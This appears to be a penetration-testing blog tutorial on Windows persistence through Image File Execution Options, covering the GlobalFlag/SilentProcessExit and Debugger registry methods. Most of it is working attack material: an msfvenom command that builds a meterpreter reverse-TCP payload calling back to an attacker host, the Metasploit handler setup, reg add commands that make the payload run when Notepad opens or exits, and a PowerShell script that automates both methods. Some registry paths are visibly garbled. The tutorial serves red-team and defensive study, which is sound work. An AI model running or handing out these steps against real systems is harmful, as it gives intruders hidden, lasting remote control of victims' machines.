Image File Execution Options is a Windows registry key which enables developers to attach a debugger to an application and to enable “GlobalFlag” for application debugging. This behavior of Windows opens the door for persistence since an arbitrary executable can be used as a debugger of a specific process or as a “MonitorProcess“. In both scenarios code execution will achieved and the trigger will be either the creation of a process or the exit of an application. However it should be noted that the implementation of this technique requires Administrator level privileges as the registry location which the keys needs to be added is under:

HKEY_LOCAL_MACHINE

GlobalFlag

Oddvar Moe discussed first in his blog the persistence technique via GlobalFlag. The implementation of this technique requires the creation of three registry keys and an arbitrary payload that will be executed upon a specific event (notepad application is closed). Metasploit utility “msfvenom” can be used to generate the malicious payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe > pentestlab.exe

Metasploit – Generate Payload

The “handler” Metasploit module needs to be configured in order to capture the payload that will executed on the target system.

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.1 set LPORT 4444 exploit

Metasploit – Handler Module

Executing the following commands as an Administrator user will create the necessary registry keys to implement the persistence technique via “GlobalFlag”.

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

otepad.exe" /v GlobalFlag /t REG_DWORD /d 512 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit

otepad.exe" /v ReportingMode /t REG_DWORD /d 1 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit

otepad.exe" /v MonitorProcess /d "C:\temp\pentestlab.exe"

Persistence Global Flag – Registry Keys

The hexadecimal value 0x200 in the “GlobalFlag” registry key enables the silent exit monitoring for the notepad process.

GlobalFlag Registry Key

The ReportingMode registry key enables the Windows Error Reporting process (WerFault.exe) which will be the parent process of the “MonitorProcess” pentestlab.exe.

Persistence SilentProcessExit – Registry Keys

When the notepad process is killed (user has closed the notepad application) the payload will be executed and the communication will establish with the command and control.

Persistence GlobalFlags – Meterpreter

This will cause the system to create a new process called “WerFault.exe” which is used for tracking errors related to operating system, Windows features and applications. The payload will be launched as a child process of Windows Error Reporting (WerFault.exe).

Persistence GlobalFlags – pentestlab Process

Debugger

Attaching a debugger into the notepad process is trivial and only requires the creation of a registry key and the malicious payload to be stored in “System32“.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

otepad.exe" /v Debugger /d "pentestlab.exe"

Persistence Debugger – Add Registry Key

Executing the above command from an elevated command prompt will create the registry key “Debugger“. The value of this key defines the executable that will be attached to the notepad process which is going to be an arbitrary payload.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

otepad.exe

Persistence Debugger – Registry Key

When the notepad process (notepad.exe) is launched this will cause the arbitrary payload to be executed and a Meterpreter session will open.

Persistence Debugger – Meterpreter

The Debugger registry key will create a new process on the system.

Persistence Debugger – pentestlab Process

PowerShell

These two persistence techniques can be automated through the following PowerShell script. The official Gist can be found here. The script has two functions and will create the registry keys required per each technique automatically.

<# ImageFileExecutionOptions v1.0 License: GPLv3 Author: @netbiosX #> # Image File Execution Options Injection Persistence Technique function Persist-Debugger { $Registry = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' Push-Location Set-Location $Registry if(Test-Path "$Registry\Image File Execution Options

otepad.exe"){ Write-Verbose 'Key Already Exists' -Verbose }else{ New-Item -Path "$Registry\Image File Execution Options" -Name 'notepad.exe' $GetRegKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

otepad.exe' $GetIFEO = Get-Item -Path "$GetRegKey" $Payload = 'pentestlab.exe' $GetIFEO | Set-ItemProperty -Name Debugger -Value $Payload } } function Persist-GlobalFlags { $Registry = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' Push-Location Set-Location $Registry if(Test-Path "$Registry\SilentProcessExit"){ Write-Verbose 'Key Already Exists' -Verbose }else{ New-Item -Path "$Registry" -Name 'SilentProcessExit' New-Item -Path "$Registry\SilentProcessExit" -Name 'notepad.exe' New-Item -Path "$Registry\Image File Execution Options" -Name 'notepad.exe' $GetRegKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit

otepad.exe' $GetReg = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

otepad.exe' $GetIFEO = Get-Item -Path "$GetRegKey" $GetIF = Get-Item -Path "$GetReg" $Payload = 'C:\temp\pentestlab.exe' $GetIFEO | New-ItemProperty -Name MonitorProcess -Value $Payload $GetIFEO | New-ItemProperty -Name ReportingMode -Value 1 -PropertyType "DWORD" $GetIF | New-ItemProperty -Name GlobalFlag -Value 512 -PropertyType "DWORD" } }

Executing the following commands will import the module and the function “Persist-Debugger” can be utilized to implement the technique. By default the notepad.exe process is used and the payload needs to be stored in: “C:\Windows\System32“.

Import-Module .\ImageFileExecutionOptions.ps1 Persist-Debugger

Persistence Image File Execution Options – Debugger PowerShell Script

Similarly to the method above the “Persist-GlobalFlags” function will create the two registry hives and will populate them with the required registry keys to perform persistence via the GlobalFlag.

Import-Module .\ImageFileExecutionOptions.ps1 Persist-GlobalFlags

Persistence Image File Execution Options – GlobalFlags PowerShell Script

References